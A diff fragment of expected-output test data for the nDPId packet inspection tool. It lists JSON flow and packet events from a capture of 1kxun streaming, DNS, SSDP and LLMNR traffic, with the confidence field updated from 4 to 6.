{"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104378454,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104378454,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxYAAAER6ZnAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378557,"flow_last_seen":1470104378557,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104378557,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -88,25 +88,25 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1470104378770,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378770,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUcsAAIAR9HrAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1470104378901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378901,"flow_last_seen":1470104378901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104378901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} 
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} 
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 
(KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": 
{"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} 
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} 
@@ -127,29 +127,29 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
